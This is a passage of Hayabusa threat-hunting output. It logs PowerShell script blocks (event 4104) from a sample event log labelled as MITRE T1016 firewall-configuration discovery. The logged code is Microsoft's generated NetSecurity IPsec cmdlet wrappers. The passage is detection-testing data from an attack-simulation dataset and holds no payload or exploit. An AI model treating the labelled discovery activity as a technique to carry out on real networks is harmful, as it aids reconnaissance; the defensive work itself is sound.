$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', 
Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] 
[Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 
$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) 
$__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { 
$__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.957 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecPhase2AuthSet ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.957 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP2AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( 
$__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if 
($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
